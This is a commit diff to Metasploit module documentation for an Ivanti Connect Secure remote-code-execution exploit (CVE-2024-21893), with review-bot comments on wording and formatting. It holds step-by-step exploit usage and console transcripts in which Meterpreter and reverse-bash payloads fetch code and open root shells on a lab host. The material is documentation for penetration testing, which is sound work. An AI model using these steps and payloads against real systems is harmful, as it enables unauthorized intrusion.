remove the linux and unix targets in favor of a single automatic target

sfewer-r7
2024-02-09 09:26:08 +00:00
parent 03a58c784b
commit 1f292c8a73
2 changed files with 59 additions and 58 deletions
@@ -20,22 +20,19 @@ below steps are for HyperV, but it should be very similar to install on VMWare.
1. Start msfconsole
2. `use exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893`
3. `set RHOST <TARGET_IP_ADDRESS>`
4. `set target 0`
5. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
6. `check`
7. `exploit`
4. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
5. `check`
6. `exploit`
## Scenarios
To support a broad set of available payloads, we support both a Linux target and a Unix Target. This allows for native
To support a broad set of available payloads, we support both the Linux and Unix platforms. This allows for native
Linux payloads to be used, but also payloads like Python meterpreter or a Bash shell.
### Linux Target
### Automatic (Linux Payload)
```
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set RHOST 192.168.86.111
RHOST => 192.168.86.111
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set target 0
target => 0
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
PAYLOAD => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > show options
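Review bot: In the Scenarios paragraph, the reworded sentence says the module supports "both the Linux and Unix platforms", but nothing in the steps or under the new "Automatic (Linux Payload)" heading tells the reader that there is now a single Automatic target and that the choice of PAYLOAD is what distinguishes the two scenarios. Since `set target 0` has been dropped from both the verification steps and the console transcript, suggest adding one sentence that says so explicitly, so that readers of older write-ups do not go looking for a target to set.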
@@ -44,33 +41,48 @@ Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.86.111 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
Proxies no A proxy chain of format type:host:port[
,type:host:port][...]
RHOSTS 192.168.86.111 yes The target host(s), see https://docs.me
tasploit.com/docs/using-metasploit/basi
cs/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
SSL true no Negotiate SSL/TLS for outgoing connecti
ons
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME BiLTwvbxndD no Name to use on remote system when storing payload; cannot contain spaces.
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR /tmp yes Remote writable dir to store payload; cannot contain spaces.
LHOST eth0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Acc
epted: CURL, FTP, TFTP, TNFTP
, WGET)
FETCH_DELETE false yes Attempt to delete the binary
after execution
FETCH_FILENAME XMZdmHhNxYx no Name to use on remote system
when storing payload; cannot
contain spaces.
FETCH_SRVHOST no Local IP to use for serving p
ayload
FETCH_SRVPORT 8080 yes Local port to use for serving
payload
FETCH_URIPATH no Local URI to use for serving
payload
FETCH_WRITABLE_DI /tmp yes Remote writable dir to store
R payload; cannot contain space
s.
LHOST eth0 yes The listen address (an interf
ace may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux Command
0 Automatic
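Review bot: The re-captured `show options` output in this hunk is wrapped at a narrower width than the capture it replaces, so the RHOSTS documentation URL is split across three lines and one option name is broken into `FETCH_WRITABLE_DI` and `R`. Anyone searching the doc for FETCH_WRITABLE_DIR or copying the URL will not find it intact. Suggest re-capturing in a wider terminal so each option stays on one line, as it did before.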
@@ -84,7 +96,7 @@ msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > exploit
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (3045380 bytes) to 192.168.86.111
[*] Meterpreter session 4 opened (192.168.86.42:4444 -> 192.168.86.111:49328) at 2024-02-06 11:38:33 +0000
[*] Meterpreter session 3 opened (192.168.86.42:4444 -> 192.168.86.111:45734) at 2024-02-09 09:21:59 +0000
meterpreter > getuid
Server username: root
@@ -104,17 +116,15 @@ export DSREL_DEPS=ive
export DSREL_BUILDNUM=1647
export DSREL_COMMENT="R1"
meterpreter > exit
[*] Shutting down session: 4
[*] Shutting down session: 3
[*] 192.168.86.111 - Meterpreter session 4 closed. Reason: User exit
[*] 192.168.86.111 - Meterpreter session 3 closed. Reason: Died
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) >
```
### Unix Target
### Automatic (Unix Payload)
```
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set target 1
target => 1
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set PAYLOAD cmd/unix/reverse_bash
PAYLOAD => cmd/unix/reverse_bash
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > show options
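Review bot: The closing line of the Linux scenario now reads "Meterpreter session 3 closed. Reason: Died" directly after `meterpreter > exit`, where the previous capture showed "Reason: User exit". Readers following the doc may take "Died" to mean the session failed rather than exited cleanly. Please confirm this is the expected output for a normal exit, or re-capture the end of the session.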
@@ -123,10 +133,14 @@ Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.86.111 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
Proxies no A proxy chain of format type:host:port[
,type:host:port][...]
RHOSTS 192.168.86.111 yes The target host(s), see https://docs.me
tasploit.com/docs/using-metasploit/basi
cs/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
SSL true no Negotiate SSL/TLS for outgoing connecti
ons
VHOST no HTTP server virtual host
@@ -134,7 +148,8 @@ Payload options (cmd/unix/reverse_bash):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST eth0 yes The listen address (an interface may be specified)
LHOST eth0 yes The listen address (an interface may be s
pecified)
LPORT 4444 yes The listen port
@@ -142,7 +157,7 @@ Exploit target:
Id Name
-- ----
1 Unix Command
0 Automatic
@@ -155,7 +170,7 @@ msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Command shell session 5 opened (192.168.86.42:4444 -> 192.168.86.111:49330) at 2024-02-06 11:39:45 +0000
[*] Command shell session 4 opened (192.168.86.42:4444 -> 192.168.86.111:45736) at 2024-02-09 09:23:15 +0000
id
uid=0(root) gid=0(root) groups=0(root)
@@ -169,6 +184,6 @@ export DSREL_DEPS=ive
export DSREL_BUILDNUM=1647
export DSREL_COMMENT="R1"
exit
[*] 192.168.86.111 - Command shell session 5 closed.
[*] 192.168.86.111 - Command shell session 4 closed.
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) >
```